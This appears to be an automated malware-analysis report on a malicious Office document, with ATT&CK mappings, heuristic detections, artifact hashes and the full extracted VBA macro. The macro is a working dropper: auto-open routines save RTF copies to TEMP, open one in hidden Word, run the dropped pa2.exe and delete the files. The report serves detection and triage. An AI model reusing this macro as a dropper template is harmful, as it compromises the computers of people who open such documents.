Verdict: MALICIOUS
Risk Score: 574

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
- T1027 Obfuscated Files or Information
The sample contains a VBA macro whose AutoOpen and Workbook_Open subroutines lead to the Manakai subroutine. Manakai creates two temporary RTF files, executes an embedded PE executable named 'pa2.exe' from the temporary directory, and then deletes the temporary files. The embedded PE executable, and the VBA macro's execution of it, indicate downloader or dropper functionality.
Heuristics (18)

- OLE with Ole10Native: possible CVE-2026-21514 exploitation [high, CVE likely] (CVE_2026_21514). Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
- ClamAV: Doc.Downloader.Generic-6698421-0 [critical] (CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0.
- Embedded PE executable [critical] (OLE_EMBEDDED_EXE). MZ/PE header found inside document; possible embedded executable.
- Ole10Native package drops an auto-executable payload [critical] (OFFICE_PACKAGE_RISKY_FILE). OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use; it is a malware-delivery dropper.
- VBA macros detected [medium, 7 related findings] (OLE_VBA_MACROS). Document contains VBA macro code.
  - Potential Shell call in VBA [critical] (OLE_VBA_SHELL). Matched line in script: `Hey (2) Shell (TEX) Hey (1)`
  - CreateObject call [high] (OLE_VBA_CREATEOBJ). Matched line in script: `Hey (2) Set appWord = CreateObject("Word.Application") appWord.Visible = False`
  - VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  - AutoOpen macro [low] (OLE_VBA_AUTOOPEN). Matched line in script: `End Sub Sub AutoOpen() BQUYHDBHA = "aksd kjahsjkdhdkasjdl kasdjh askdg aksj d"`
  - Workbook_Open macro [low] (OLE_VBA_WBOPEN). Matched line in script: `End Sub Sub Workbook_Open() HUQDHUIQW = "huqw dhqwui hksdjhqwuidhwqidhquwi d hqwduihauigsd"`
  - Auto_Open macro [low] (OLE_VBA_AUTO). Matched line in script: `BQUYHDBHA = "aksd kjahsjkdhdkasjdl kasdjh askdg aksj d" Auto_Open End Sub`
  - Environ() call (env variable access) [low] (OLE_VBA_ENVIRON). Matched line in script: `On Error Resume Next TMP = Environ$("TEMP") + "\" TCA = TMP + "199.rtf"`
- Reference to LoadLibrary API [high] (SC_STR_LOADLIBRARY).
- Reference to GetProcAddress API [high] (SC_STR_GETPROCADDRESS).
- Suspicious extracted artifact [high] (EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Reference to VirtualAlloc API [medium] (SC_STR_VIRTUALALLOC).
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (3)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1441 bytes | 54a05fdc3f25498a6f0cd403cf8e780597961c8dab4862e5ee1585eefff4aa70 |
| embedded_office_0000344a.exe | embedded-pe | Office MZ+PE at offset 0x344A | 285114 bytes | 41664da82114b50098c848f3c5fe63e03c7dda49a29cc2b21a1f93aee4e99ebf |
| ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1505225770/Ole10Native | 256704 bytes | c42b742b1239f0ed56edc9302d7187a504e51dbeb4350730ec2d92c75bd7cc41 |

Preview script for macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub qhdjkashdwd_Open()
End Sub
Sub asdhkjahajks_Open()
BQJAHSD = "asdhjkajs kjdlkasj djahsdjkas"
End Sub
Sub AutoOpen()
BQUYHDBHA = "aksd kjahsjkdhdkasjdl kasdjh askdg aksj d"
Auto_Open
End Sub
Sub Manakai()
On Error Resume Next
TMP = Environ$("TEMP") + "\"
TCA = TMP + "199.rtf"
TCB = TMP + "200.rtf"
TEX = TMP + "pa2.e" + "xe"
SaveAsRTF (TCA)
SaveAsRTF (TCB)
Hey (2)
Set appWord = CreateObject("Word.Application")
appWord.Visible = False
Set docWord = appWord.Documents.Open(TCA)
Hey (2)
Shell (TEX)
Hey (1)
appWord.Quit
Set appWord = Nothing
Kill TCA
Kill TEX
End Sub
Sub Iriada()
NKJASDSD = "askjd asjasj ldkadjkahaksj d"
Manakai
End Sub
Sub Workbook_Open()
HUQDHUIQW = "huqw dhqwui hksdjhqwuidhwqidhquwi d hqwduihauigsd"
Iriada
End Sub
Sub Hey(Kalamana As Long)
Dim Jhbhds As Long
Jhbhds = Timer + Kalamana
Do While Timer < Jhbhds
DoEvents
Loop
End Sub
Public Function SaveAsRTF(Name As String)
ActiveDocument.SaveAs FileName:=Name, FileFormat:=wdFormatRTF
End Function
Sub Auto_Open()
Iriada
BHJQWDASD = "ajksdhj aksdasgdhjagskdj "
End Sub
```

Detection (detail row listed beneath the embedded_office_0000344a.exe entry):
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved macro source contains an auto-exec entry point and execution/download terms.